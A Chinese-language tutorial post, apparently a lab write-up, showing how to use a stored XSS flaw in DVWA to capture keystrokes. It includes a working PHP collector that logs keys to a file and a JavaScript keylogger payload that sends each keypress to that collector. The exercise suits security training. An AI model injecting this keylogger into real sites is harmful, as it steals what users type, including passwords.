欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

XSS漏洞利用——键盘记录

程序员文章站 2022-05-26 08:17:04
...

实验环境:DVWA

实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器

实验步骤:

一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。

php代码如下:

<?php
$file=fopen("key.txt","a");
if(isset($_REQUEST['key'])){
	$key=$_REQUEST['key'];
	fputs($file,$key);
}
?>

二、编写js脚本

<script>
   window.onkeydown=function(ev){
		xhr =new XMLHttpRequest();
		xhr.open('POST','http://localhost/xss/keylog/keylog.php',true);
		xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
		xhr.send('key='+String.fromCharCode(ev.keyCode));		
   }
</script>

三、打开低级别DVWA,选择储存xss模块,将js脚本写入留言框,执行代码

XSS漏洞利用——键盘记录

四、可看到当在输入框输入内容时,key.txt已经将键盘记录下来了

XSS漏洞利用——键盘记录

相关标签: web渗透